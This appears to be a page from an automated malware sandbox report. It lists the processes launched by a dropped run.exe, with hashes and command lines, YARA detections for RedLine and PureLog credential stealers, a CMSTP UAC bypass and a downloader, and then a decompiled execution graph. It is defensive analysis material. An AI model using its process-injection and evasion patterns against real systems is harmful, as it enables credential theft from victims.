                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe"
                                                                                                                                                                                                                                    Imagebase:0xb90000
                                                                                                                                                                                                                                    File size:2'469'936 bytes
                                                                                                                                                                                                                                    MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                    Start time:01:32:01
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                    Start time:01:32:01
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                    Start time:01:32:16
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                                                                                                                                                                                                    Imagebase:0x20ee5400000
                                                                                                                                                                                                                                    File size:59'721'128 bytes
                                                                                                                                                                                                                                    MD5 hash:8E9C467EAC35B35DA1F586014F29C330
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000000.2395167883.0000020EE543B000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                    Start time:01:32:18
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                    Imagebase:0x490000
                                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                    Start time:01:32:21
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"
                                                                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                    Start time:01:32:21
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                    Start time:01:32:21
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"
                                                                                                                                                                                                                                    Imagebase:0x580000
                                                                                                                                                                                                                                    File size:545'792 bytes
                                                                                                                                                                                                                                    MD5 hash:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                    Start time:01:32:22
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 2108
                                                                                                                                                                                                                                    Imagebase:0x610000
                                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:5.9%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                                                                                                      Signature Coverage:13%
                                                                                                                                                                                                                                      Total number of Nodes:1113
                                                                                                                                                                                                                                      Total number of Limit Nodes:16
                                                                                                                                                                                                                                      execution_graph 38336 41aed0 38341 41ac9e 38336->38341 38340 41aef8 38346 41acc9 38341->38346 38343 41aebc 38360 410905 26 API calls _Deallocate 38343->38360 38345 41ae1b 38345->38340 38353 41a222 38345->38353 38352 41ae12 38346->38352 38356 422bb9 46 API calls 2 library calls 38346->38356 38348 41ae5c 38348->38352 38357 422bb9 46 API calls 2 library calls 38348->38357 38350 41ae7b 38350->38352 38358 422bb9 46 API calls 2 library calls 38350->38358 38352->38345 38359 412381 20 API calls _free 38352->38359 38361 419bf7 38353->38361 38355 41a23d 38355->38340 38356->38348 38357->38350 38358->38352 38359->38343 38360->38345 38364 419c03 __FrameHandler3::FrameUnwindToState 38361->38364 38362 419c11 38379 412381 20 API calls _free 38362->38379 38364->38362 38366 419c4a 38364->38366 38365 419c16 38380 410905 26 API calls _Deallocate 38365->38380 38372 41a1d1 38366->38372 38369 419c20 std::_Xfsopen 38369->38355 38382 4227a8 38372->38382 38375 419c6e 38381 419c97 LeaveCriticalSection __wsopen_s 38375->38381 38379->38365 38380->38369 38381->38369 38383 4227b4 38382->38383 38384 4227cb 38382->38384 38460 412381 20 API calls _free 38383->38460 38386 4227d3 38384->38386 38387 4227ea 38384->38387 38462 412381 20 API calls _free 38386->38462 38464 4172ce 10 API calls 2 library calls 38387->38464 38389 4227b9 38461 410905 26 API calls _Deallocate 38389->38461 38391 4227f1 MultiByteToWideChar 38394 422820 38391->38394 38395 422810 GetLastError 38391->38395 38393 4227d8 38463 410905 26 API calls _Deallocate 38393->38463 38466 417a45 38394->38466 38465 41234b 20 API calls 2 library calls 38395->38465 38399 41a1e7 38399->38375 38406 41a242 38399->38406 38401 422850 38404 41629a _free 20 API calls 38401->38404 38402 42282f MultiByteToWideChar 38402->38401 38403 422844 GetLastError 38402->38403 38473 41234b 20 API calls 2 library calls 38403->38473 38404->38399 38407 41a25f 38406->38407 38408 41a274 38407->38408 38409 41a28d 38407->38409 38490 41236e 20 API calls _free 38408->38490 38476 41e6a7 38409->38476 38412 41a292 38414 41a2b2 38412->38414 38415 41a29b 38412->38415 38413 41a279 38491 412381 20 API calls _free 38413->38491 38489 419f10 CreateFileW 38414->38489 38492 41236e 20 API calls _free 38415->38492 38419 41a2a0 38493 412381 20 API calls _free 38419->38493 38421 41a368 GetFileType 38422 41a373 GetLastError 38421->38422 38423 41a3ba 38421->38423 38496 41234b 20 API calls 2 library calls 38422->38496 38498 41e5f0 21 API calls 3 library calls 38423->38498 38424 41a33d GetLastError 38495 41234b 20 API calls 2 library calls 38424->38495 38425 41a2eb 38425->38421 38425->38424 38494 419f10 CreateFileW 38425->38494 38429 41a381 CloseHandle 38429->38413 38432 41a3aa 38429->38432 38431 41a330 38431->38421 38431->38424 38497 412381 20 API calls _free 38432->38497 38433 41a3db 38435 41a42e 38433->38435 38499 41a121 72 API calls 5 library calls 38433->38499 38500 419cc3 73 API calls 5 library calls 38435->38500 38436 41a3af 38436->38413 38439 41a427 38439->38435 38441 41a456 38439->38441 38440 41a44d 38442 41a454 38440->38442 38444 41a465 38440->38444 38501 4163fd 38441->38501 38442->38441 38445 41a544 38444->38445 38447 41a4e3 CloseHandle 38444->38447 38446 41a20f 38445->38446 38454 41629a 38446->38454 38516 419f10 CreateFileW 38447->38516 38449 41a50e 38449->38445 38450 41a518 GetLastError 38449->38450 38517 41234b 20 API calls 2 library calls 38450->38517 38452 41a524 38518 41e7b9 21 API calls 3 library calls 38452->38518 38455 4162a5 RtlFreeHeap 38454->38455 38459 4162ce _free 38454->38459 38456 4162ba 38455->38456 38455->38459 38546 412381 20 API calls _free 38456->38546 38458 4162c0 GetLastError 38458->38459 38459->38375 38460->38389 38461->38399 38462->38393 38463->38399 38464->38391 38465->38399 38467 417a83 38466->38467 38471 417a53 __FrameHandler3::FrameUnwindToState 38466->38471 38475 412381 20 API calls _free 38467->38475 38468 417a6e RtlAllocateHeap 38470 417a81 38468->38470 38468->38471 38470->38401 38470->38402 38471->38467 38471->38468 38474 412ede 7 API calls 2 library calls 38471->38474 38473->38401 38474->38471 38475->38470 38477 41e6b3 __FrameHandler3::FrameUnwindToState 38476->38477 38519 4119fb EnterCriticalSection 38477->38519 38479 41e701 38520 41e7b0 38479->38520 38480 41e6df 38523 41e486 21 API calls 2 library calls 38480->38523 38483 41e72a std::_Xfsopen 38483->38412 38484 41e6ba 38484->38479 38484->38480 38486 41e74d EnterCriticalSection 38484->38486 38485 41e6e4 38485->38479 38524 41e5cd EnterCriticalSection 38485->38524 38486->38479 38487 41e75a LeaveCriticalSection 38486->38487 38487->38484 38489->38425 38490->38413 38491->38446 38492->38419 38493->38413 38494->38431 38495->38413 38496->38429 38497->38436 38498->38433 38499->38439 38500->38440 38526 41e84a 38501->38526 38503 416413 38539 41e7b9 21 API calls 3 library calls 38503->38539 38505 41640d 38505->38503 38507 41e84a __wsopen_s 26 API calls 38505->38507 38515 416445 38505->38515 38506 41646b 38513 41648d 38506->38513 38540 41234b 20 API calls 2 library calls 38506->38540 38509 41643c 38507->38509 38508 41e84a __wsopen_s 26 API calls 38510 416451 FindCloseChangeNotification 38508->38510 38514 41e84a __wsopen_s 26 API calls 38509->38514 38510->38503 38511 41645d GetLastError 38510->38511 38511->38503 38513->38446 38514->38515 38515->38503 38515->38508 38516->38449 38517->38452 38518->38445 38519->38484 38525 411a43 LeaveCriticalSection 38520->38525 38522 41e7b7 38522->38483 38523->38485 38524->38479 38525->38522 38527 41e857 38526->38527 38530 41e86c 38526->38530 38541 41236e 20 API calls _free 38527->38541 38529 41e85c 38542 412381 20 API calls _free 38529->38542 38533 41e891 38530->38533 38543 41236e 20 API calls _free 38530->38543 38533->38505 38534 41e89c 38544 412381 20 API calls _free 38534->38544 38535 41e864 38535->38505 38537 41e8a4 38545 410905 26 API calls _Deallocate 38537->38545 38539->38506 38540->38513 38541->38529 38542->38535 38543->38534 38544->38537 38545->38535 38546->38458 38547 4017a2 38548 4017d0 38547->38548 38549 4017ab 38547->38549 38557 401b1e 38548->38557 38553 402c71 38549->38553 38551 4017cb 38554 402ca4 38553->38554 38556 402c80 BuildCatchObjectHelperInternal 38553->38556 38560 40373e 27 API calls 2 library calls 38554->38560 38556->38551 38561 402c50 38557->38561 38560->38556 38562 402c5a 38561->38562 38562->38562 38563 402c71 27 API calls 38562->38563 38564 401b3a 38563->38564 38564->38551 38565 408273 38566 40828f 38565->38566 38568 40831c std::_Xfsopen 29 API calls 38566->38568 38569 4082ce 38566->38569 38574 4082db 38566->38574 38568->38569 38572 4082d5 38569->38572 38575 40831c 38569->38575 38572->38574 38581 40e228 38572->38581 38594 411d27 38575->38594 38577 4082ee 38577->38574 38578 4106ef 38577->38578 38648 41049b 38578->38648 38580 410705 38580->38572 38582 40e234 __FrameHandler3::FrameUnwindToState 38581->38582 38583 40e245 38582->38583 38584 40e25a 38582->38584 38728 412381 20 API calls _free 38583->38728 38590 40e255 std::_Xfsopen _Xfiopen 38584->38590 38711 40e81d EnterCriticalSection 38584->38711 38587 40e24a 38729 410905 26 API calls _Deallocate 38587->38729 38588 40e276 38712 40e1b2 38588->38712 38590->38574 38592 40e281 38730 40e29e LeaveCriticalSection __fread_nolock 38592->38730 38596 411c66 __FrameHandler3::FrameUnwindToState 38594->38596 38595 411c80 38619 412381 20 API calls _free 38595->38619 38596->38595 38599 411cad 38596->38599 38598 411c85 38620 410905 26 API calls _Deallocate 38598->38620 38601 411cb2 38599->38601 38602 411cbf 38599->38602 38621 412381 20 API calls _free 38601->38621 38611 416499 38602->38611 38605 411cc8 38606 411cdc std::_Xfsopen 38605->38606 38607 411ccf 38605->38607 38623 411d10 LeaveCriticalSection __fread_nolock _Xfiopen 38606->38623 38622 412381 20 API calls _free 38607->38622 38608 411c90 std::_Xfsopen 38608->38577 38612 4164a5 __FrameHandler3::FrameUnwindToState 38611->38612 38624 4119fb EnterCriticalSection 38612->38624 38614 4164b3 38625 416533 38614->38625 38618 4164e4 std::_Xfsopen 38618->38605 38619->38598 38620->38608 38621->38608 38622->38608 38623->38608 38624->38614 38632 416556 38625->38632 38626 4164c0 38639 4164ef 38626->38639 38627 4165af 38644 41704e 20 API calls 3 library calls 38627->38644 38629 4165b8 38631 41629a _free 20 API calls 38629->38631 38633 4165c1 38631->38633 38632->38626 38632->38627 38632->38632 38642 40e81d EnterCriticalSection 38632->38642 38643 40e831 LeaveCriticalSection 38632->38643 38633->38626 38645 4175b5 11 API calls 2 library calls 38633->38645 38635 4165e0 38646 40e81d EnterCriticalSection 38635->38646 38638 4165f3 38638->38626 38647 411a43 LeaveCriticalSection 38639->38647 38641 4164f6 38641->38618 38642->38632 38643->38632 38644->38629 38645->38635 38646->38638 38647->38641 38649 4104a7 __FrameHandler3::FrameUnwindToState 38648->38649 38650 4104b3 38649->38650 38652 4104d9 38649->38652 38673 412381 20 API calls _free 38650->38673 38661 40e81d EnterCriticalSection 38652->38661 38653 4104b8 38674 410905 26 API calls _Deallocate 38653->38674 38655 4104e5 38662 4105fb 38655->38662 38658 4104f9 38675 410518 LeaveCriticalSection __fread_nolock 38658->38675 38660 4104c3 std::_Xfsopen 38660->38580 38661->38655 38663 41061d 38662->38663 38664 41060d 38662->38664 38676 410522 38663->38676 38689 412381 20 API calls _free 38664->38689 38667 410612 38667->38658 38668 4106bf 38668->38658 38669 410640 _Xfiopen 38669->38668 38680 40dfcb 38669->38680 38673->38653 38674->38660 38675->38660 38677 41052e _Xfiopen 38676->38677 38678 410535 38676->38678 38677->38669 38678->38677 38679 419800 _Xfiopen 28 API calls 38678->38679 38679->38677 38681 40dfe3 38680->38681 38682 40dfdf 38680->38682 38681->38682 38690 4154e8 38681->38690 38686 419800 38682->38686 38684 40e003 38697 415fa3 62 API calls 7 library calls 38684->38697 38700 419767 38686->38700 38689->38667 38691 4154f4 38690->38691 38692 415509 38690->38692 38698 412381 20 API calls _free 38691->38698 38692->38684 38694 4154f9 38699 410905 26 API calls _Deallocate 38694->38699 38696 415504 38696->38684 38697->38682 38698->38694 38699->38696 38701 41e84a __wsopen_s 26 API calls 38700->38701 38702 419779 38701->38702 38703 419781 38702->38703 38704 419792 SetFilePointerEx 38702->38704 38709 412381 20 API calls _free 38703->38709 38706 419786 38704->38706 38707 4197aa GetLastError 38704->38707 38706->38668 38710 41234b 20 API calls 2 library calls 38707->38710 38709->38706 38710->38706 38711->38588 38713 40e1d4 38712->38713 38714 40e1bf 38712->38714 38717 40dfcb _Xfiopen 62 API calls 38713->38717 38720 40e1cf _Xfiopen 38713->38720 38750 412381 20 API calls _free 38714->38750 38716 40e1c4 38751 410905 26 API calls _Deallocate 38716->38751 38719 40e1e8 38717->38719 38731 4165f6 38719->38731 38720->38592 38723 4154e8 _Xfiopen 26 API calls 38724 40e1f6 38723->38724 38735 41637e 38724->38735 38727 41629a _free 20 API calls 38727->38720 38728->38587 38729->38590 38730->38590 38732 40e1f0 38731->38732 38733 41660c 38731->38733 38732->38723 38733->38732 38734 41629a _free 20 API calls 38733->38734 38734->38732 38736 4163a2 38735->38736 38737 41638d 38735->38737 38738 4163dd 38736->38738 38742 4163c9 38736->38742 38755 41236e 20 API calls _free 38737->38755 38757 41236e 20 API calls _free 38738->38757 38741 416392 38756 412381 20 API calls _free 38741->38756 38752 416356 38742->38752 38743 4163e2 38758 412381 20 API calls _free 38743->38758 38747 4163ea 38759 410905 26 API calls _Deallocate 38747->38759 38748 40e1fc 38748->38720 38748->38727 38750->38716 38751->38720 38760 4162d4 38752->38760 38754 41637a 38754->38748 38755->38741 38756->38748 38757->38743 38758->38747 38759->38748 38761 4162e0 __FrameHandler3::FrameUnwindToState 38760->38761 38771 41e5cd EnterCriticalSection 38761->38771 38763 4162ee 38764 416320 38763->38764 38765 416315 38763->38765 38772 412381 20 API calls _free 38764->38772 38767 4163fd __wsopen_s 29 API calls 38765->38767 38768 41631b 38767->38768 38773 41634a LeaveCriticalSection __wsopen_s 38768->38773 38770 41633d std::_Xfsopen 38770->38754 38771->38763 38772->38768 38773->38770 38774 416ec2 38775 416ecf 38774->38775 38778 416ee7 38774->38778 38824 412381 20 API calls _free 38775->38824 38777 416ed4 38825 410905 26 API calls _Deallocate 38777->38825 38780 416f42 38778->38780 38788 416edf 38778->38788 38826 418c55 21 API calls 2 library calls 38778->38826 38782 4154e8 _Xfiopen 26 API calls 38780->38782 38783 416f5a 38782->38783 38794 41919a 38783->38794 38785 416f61 38786 4154e8 _Xfiopen 26 API calls 38785->38786 38785->38788 38787 416f8d 38786->38787 38787->38788 38789 4154e8 _Xfiopen 26 API calls 38787->38789 38790 416f9b 38789->38790 38790->38788 38791 4154e8 _Xfiopen 26 API calls 38790->38791 38792 416fab 38791->38792 38793 4154e8 _Xfiopen 26 API calls 38792->38793 38793->38788 38795 4191a6 __FrameHandler3::FrameUnwindToState 38794->38795 38796 4191c6 38795->38796 38797 4191ae 38795->38797 38799 41928c 38796->38799 38804 4191ff 38796->38804 38893 41236e 20 API calls _free 38797->38893 38900 41236e 20 API calls _free 38799->38900 38801 4191b3 38894 412381 20 API calls _free 38801->38894 38802 419291 38901 412381 20 API calls _free 38802->38901 38806 419223 38804->38806 38807 41920e 38804->38807 38827 41e5cd EnterCriticalSection 38806->38827 38895 41236e 20 API calls _free 38807->38895 38809 41921b 38902 410905 26 API calls _Deallocate 38809->38902 38811 419229 38813 419245 38811->38813 38814 41925a 38811->38814 38812 419213 38896 412381 20 API calls _free 38812->38896 38897 412381 20 API calls _free 38813->38897 38828 4192ad 38814->38828 38816 4191bb std::_Xfsopen 38816->38785 38820 41924a 38898 41236e 20 API calls _free 38820->38898 38821 419255 38899 419284 LeaveCriticalSection __wsopen_s 38821->38899 38824->38777 38825->38788 38826->38780 38827->38811 38829 4192d7 38828->38829 38830 4192bf 38828->38830 38832 419641 38829->38832 38837 41931c 38829->38837 38912 41236e 20 API calls _free 38830->38912 38926 41236e 20 API calls _free 38832->38926 38833 4192c4 38913 412381 20 API calls _free 38833->38913 38836 419646 38927 412381 20 API calls _free 38836->38927 38838 4192cc 38837->38838 38840 419327 38837->38840 38843 419357 38837->38843 38838->38821 38914 41236e 20 API calls _free 38840->38914 38842 41932c 38915 412381 20 API calls _free 38842->38915 38847 419370 38843->38847 38848 4193b2 38843->38848 38849 419396 38843->38849 38846 419334 38928 410905 26 API calls _Deallocate 38846->38928 38847->38849 38853 41937d 38847->38853 38851 417a45 std::_Locinfo::_Locinfo_dtor 21 API calls 38848->38851 38916 41236e 20 API calls _free 38849->38916 38854 4193c9 38851->38854 38852 41939b 38917 412381 20 API calls _free 38852->38917 38903 4210f9 38853->38903 38857 41629a _free 20 API calls 38854->38857 38860 4193d2 38857->38860 38858 41951b 38861 419591 38858->38861 38865 419534 GetConsoleMode 38858->38865 38859 4193a2 38918 410905 26 API calls _Deallocate 38859->38918 38863 41629a _free 20 API calls 38860->38863 38864 419595 ReadFile 38861->38864 38866 4193d9 38863->38866 38867 419609 GetLastError 38864->38867 38868 4195af 38864->38868 38865->38861 38869 419545 38865->38869 38870 4193e3 38866->38870 38871 4193fe 38866->38871 38872 419616 38867->38872 38873 41956d 38867->38873 38868->38867 38874 419586 38868->38874 38869->38864 38875 41954b ReadConsoleW 38869->38875 38919 412381 20 API calls _free 38870->38919 38880 419800 _Xfiopen 28 API calls 38871->38880 38924 412381 20 API calls _free 38872->38924 38890 4193ad __fread_nolock 38873->38890 38921 41234b 20 API calls 2 library calls 38873->38921 38886 4195d4 38874->38886 38887 4195eb 38874->38887 38874->38890 38875->38874 38876 419567 GetLastError 38875->38876 38876->38873 38877 41629a _free 20 API calls 38877->38838 38880->38853 38882 4193e8 38920 41236e 20 API calls _free 38882->38920 38883 41961b 38925 41236e 20 API calls _free 38883->38925 38922 418fc9 31 API calls 4 library calls 38886->38922 38889 419602 38887->38889 38887->38890 38923 418e09 29 API calls _Xfiopen 38889->38923 38890->38877 38892 419607 38892->38890 38893->38801 38894->38816 38895->38812 38896->38809 38897->38820 38898->38821 38899->38816 38900->38802 38901->38809 38902->38816 38904 421113 38903->38904 38905 421106 38903->38905 38908 42111f 38904->38908 38930 412381 20 API calls _free 38904->38930 38929 412381 20 API calls _free 38905->38929 38907 42110b 38907->38858 38908->38858 38910 421140 38931 410905 26 API calls _Deallocate 38910->38931 38912->38833 38913->38838 38914->38842 38915->38846 38916->38852 38917->38859 38918->38890 38919->38882 38920->38890 38921->38890 38922->38890 38923->38892 38924->38883 38925->38890 38926->38836 38927->38846 38928->38838 38929->38907 38930->38910 38931->38907 38932 409385 38933 409391 __FrameHandler3::FrameUnwindToState 38932->38933 38964 40959e 38933->38964 38935 409398 38936 4094eb 38935->38936 38940 4093c2 38935->38940 39070 409a73 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 38936->39070 38938 4094f2 39061 413b51 38938->39061 38947 409401 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 38940->38947 39064 413876 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38940->39064 38944 4093db 38946 4093e1 38944->38946 39065 41381a 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38944->39065 38949 409462 38947->38949 39066 40e677 39 API calls 6 library calls 38947->39066 38975 409b8d 38949->38975 38965 4095a7 38964->38965 39072 409d1b IsProcessorFeaturePresent 38965->39072 38967 4095b3 39073 40c90d 10 API calls 3 library calls 38967->39073 38969 4095b8 38974 4095bc 38969->38974 39074 415329 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38969->39074 38971 4095d3 38971->38935 38972 4095c5 38972->38971 39075 40c936 8 API calls 3 library calls 38972->39075 38974->38935 39076 40b740 38975->39076 38978 409468 38979 4137c7 38978->38979 39078 41e091 38979->39078 38981 4137d0 38982 409471 38981->38982 39082 41e39b 38 API calls 38981->39082 38984 424a0e 38982->38984 38985 424a1e _Xfiopen 38984->38985 38986 401b1e 27 API calls 38985->38986 38987 424a4c 38986->38987 39084 403498 38987->39084 38992 401b1e 27 API calls 38993 424aac 38992->38993 39091 4265bc 38993->39091 38996 401b1e 27 API calls 38997 424ac5 GetModuleFileNameA 38996->38997 38998 401b1e 27 API calls 38997->38998 38999 424aee 38998->38999 39111 42604a 38999->39111 39001 424afe 39002 4252ab 39001->39002 39003 401b1e 27 API calls 39001->39003 39004 401b1e 27 API calls 39002->39004 39006 424f72 39003->39006 39005 425482 39004->39005 39215 40356f 39005->39215 39130 4034e3 39006->39130 39009 42549f 39010 42676c 63 API calls 39009->39010 39017 425526 39010->39017 39011 424f9c 39138 42676c 39011->39138 39013 4250db 39201 42615a 39013->39201 39018 42676c 63 API calls 39017->39018 39023 42588a ___scrt_fastfail 39018->39023 39019 425fc0 39251 4019f8 26 API calls 39019->39251 39023->39019 39223 426582 39023->39223 39025 4258f8 39226 426242 CreateFileA 39025->39226 39029 401b1e 27 API calls 39030 425924 39029->39030 